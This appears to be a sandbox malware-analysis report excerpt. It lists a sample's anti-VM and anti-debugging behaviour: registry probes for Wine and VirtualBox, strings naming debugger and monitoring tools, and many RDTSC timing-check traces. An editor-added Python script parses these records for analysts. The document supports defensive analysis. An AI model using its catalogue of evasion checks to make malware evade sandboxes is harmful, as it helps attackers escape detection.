Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: SxQyhJr.exe PID: 7396, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine (recorded 3 times)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (recorded 3 times)
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: HKEY_CURRENT_USER\Software\Wine (recorded 2 times)
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (recorded 2 times)
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
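The registry probes above and the RDTSC interceptor traces that follow are the raw evasion evidence for this sample. The script below is an example added by the editor, not code from the sandbox report or its vendor: it parses both record kinds, as printed in this report, into a per-process summary (which VM artifacts each binary probes for, how many rdtsc-to-rdtsc windows were trapped, how much filler sits between the two reads, how many branches that filler contains, and whether the first read's value is overwritten straight away by "pop edx / pop eax", the pattern visible in most of the traces below). The sample records are copied from this report section; the mapping from registry key to VM artifact name is the editor's annotation, not something the report states.

```python
"""Per-process summary of the sandbox-evasion records in this report.

Editor-added example, not code from the report or its vendor. It parses two
record kinds that appear verbatim in the report: 'File opened: <registry key>'
and 'RDTSC instruction interceptor: ... instructions: ...'.
"""
import re
from collections import defaultdict
from statistics import mean

# Editor's annotation of what each probed key reveals; the report lists only the keys.
VM_ARTIFACTS = {
    r"HKEY_CURRENT_USER\Software\Wine": "Wine",
    r"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__": "VirtualBox ACPI table",
}

# Key is \S+ so trailing text (a link label or a repeat count) is ignored.
REG_RE = re.compile(r"^Source: (?P<proc>.+?) File opened: (?P<key>\S+)")
RDTSC_RE = re.compile(
    r"^Source: (?P<proc>.+?) RDTSC instruction interceptor: First address: "
    r"(?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<insns>.*)$"
)
# One disassembled instruction: 8-digit offset, then text up to the next offset.
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8}) (.+?)(?= 0x[0-9A-Fa-f]{8} |$)")


def parse_registry_probe(line):
    """Return (process, registry key) for a registry-open record, else None."""
    m = REG_RE.match(line)
    return (m.group("proc"), m.group("key")) if m else None


def parse_rdtsc_record(line):
    """Describe one rdtsc-to-rdtsc window; None if the line is another record kind."""
    m = RDTSC_RE.match(line)
    if not m:
        return None
    insns = [text.strip() for _, text in INSN_RE.findall(m.group("insns"))]
    filler = insns[1:-1]  # the trace is bracketed by the two rdtsc reads
    # rdtsc writes edx:eax; 'pop edx / pop eax' straight after overwrites the value.
    discarded = insns[1:3] == ["pop edx", "pop eax"]
    branches = sum(1 for t in filler if t.split()[0] in ("call", "ret") or t.startswith("j"))
    return {
        "process": m.group("proc"),
        "first": int(m.group("first"), 16),
        "second": int(m.group("second"), 16),
        "filler": len(filler),
        "branches": branches,
        "result_discarded": discarded,
    }


def summarize(lines):
    """Aggregate registry probes and rdtsc windows per source process."""
    out = defaultdict(lambda: {"vm_artifacts": set(), "rdtsc_windows": 0,
                               "rdtsc_discarded": 0, "filler_lengths": []})
    for line in lines:
        probe = parse_registry_probe(line)
        if probe:
            proc, key = probe
            out[proc]["vm_artifacts"].add(VM_ARTIFACTS.get(key, key))
            continue
        rec = parse_rdtsc_record(line)
        if rec:
            p = out[rec["process"]]
            p["rdtsc_windows"] += 1
            p["rdtsc_discarded"] += int(rec["result_discarded"])
            p["filler_lengths"].append(rec["filler"])
    for p in out.values():
        p["mean_filler"] = mean(p["filler_lengths"]) if p["filler_lengths"] else 0.0
    return dict(out)


# Sample records copied from this report section (link labels dropped).
SAMPLE = [
    r"Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine",
    r"Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__",
    r"Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe File opened: HKEY_CURRENT_USER\Software\Wine",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF9E6 second address: 8EF9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F09BA second address: 8F09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB7D50A5EDDh 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FB7D50A5ED6h 0x00000014 jns 00007FB7D50A5ED6h 0x0000001a rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC4F second address: 8EFC69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B855h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc",
]

if __name__ == "__main__":
    for proc, info in summarize(SAMPLE).items():
        print(proc, sorted(info["vm_artifacts"]), info["rdtsc_windows"],
              info["rdtsc_discarded"], round(info["mean_filler"], 1))
```

Feed it the whole report text, one record per line, to get the same table for every process in the chain. The result_discarded flag is the first thing to look at when deciding which trapped windows to spend time on: a window where the value read by rdtsc is overwritten two instructions later cannot be the comparison side of a timing check, so the windows where the value stays live are the ones worth tracing further.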
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F09BA second address: 8F09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB7D50A5EDDh 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FB7D50A5ED6h 0x00000014 jns 00007FB7D50A5ED6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF9E6 second address: 8EF9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF9EC second address: 8EF9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF9F0 second address: 8EF9F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC35 second address: 8EFC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB7D50A5EE3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC4F second address: 8EFC69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B855h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC69 second address: 8EFC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jns 00007FB7D50A5ED6h 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jp 00007FB7D50A5ED6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC88 second address: 8EFC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC8E second address: 8EFC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE09 second address: 8EFE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE15 second address: 8EFE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnp 00007FB7D50A5ED8h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB7D50A5EDEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE36 second address: 8EFE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE3A second address: 8EFE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE46 second address: 8EFE4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE4A second address: 8EFE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D50A5EDAh 0x00000012 jmp 00007FB7D50A5EE1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE80 second address: 8EFE84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0284 second address: 8F0288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0288 second address: 8F028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F028E second address: 8F02AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB7D50A5EDCh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3E18 second address: 8F3E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3F73 second address: 8F3F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3F79 second address: 8F3F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3F85 second address: 8F3F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3FED second address: 8F4005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB7D509B84Ch 0x0000000b jg 00007FB7D509B846h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F4005 second address: 8F400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F400A second address: 8F400F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F400F second address: 8F408C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FB7D50A5ED8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D2A8Ah] 0x00000028 mov dl, cl 0x0000002a push 00000000h 0x0000002c jmp 00007FB7D50A5EE7h 0x00000031 call 00007FB7D50A5ED9h 0x00000036 push ebx 0x00000037 jl 00007FB7D50A5EDCh 0x0000003d jnp 00007FB7D50A5ED6h 0x00000043 pop ebx 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB7D50A5EE7h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F408C second address: 8F40A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B850h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40A0 second address: 8F40C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB7D50A5EE4h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40C6 second address: 8F40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40D1 second address: 8F40EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007FB7D50A5EDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40EC second address: 8F4173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB7D509B848h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 stc 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D3889h], edx 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D3858h], eax 0x00000032 je 00007FB7D509B84Ch 0x00000038 mov dword ptr [ebp+122D3A6Dh], eax 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FB7D509B848h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a call 00007FB7D509B849h 0x0000005f push ecx 0x00000060 jnp 00007FB7D509B848h 0x00000066 pop ecx 0x00000067 push eax 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b jne 00007FB7D509B846h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F4173 second address: 8F41DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007FB7D50A5EE5h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FB7D50A5EDBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push edi 0x0000001e push eax 0x0000001f jbe 00007FB7D50A5ED6h 0x00000025 pop eax 0x00000026 pop edi 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FB7D50A5ED8h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 lea ebx, dword ptr [ebp+12458D75h] 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c je 00007FB7D50A5ED6h 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E6599 second address: 8E65E5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB7D509B846h 0x00000008 jmp 00007FB7D509B851h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push eax 0x00000011 pushad 0x00000012 jno 00007FB7D509B846h 0x00000018 jg 00007FB7D509B846h 0x0000001e jo 00007FB7D509B846h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jnp 00007FB7D509B846h 0x0000002f jmp 00007FB7D509B851h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CAA second address: 912CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CB0 second address: 912CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CB6 second address: 912CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CBA second address: 912CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B852h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CD3 second address: 912CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007FB7D50A5EDCh 0x0000000e jnp 00007FB7D50A5EE4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CFF second address: 912D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913158 second address: 913160 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913D7F second address: 913D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913D89 second address: 913D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913D8F second address: 913D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909090 second address: 909098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909098 second address: 90909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9A53 second address: 8E9A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB7D50A5ED6h 0x0000000a jnl 00007FB7D50A5ED6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9A63 second address: 8E9A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9A67 second address: 8E9A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914525 second address: 91456A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B84Ch 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FB7D509B84Ah 0x00000014 push edi 0x00000015 jmp 00007FB7D509B857h 0x0000001a pop edi 0x0000001b pushad 0x0000001c jbe 00007FB7D509B846h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91456A second address: 914579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FB7D50A5ED6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
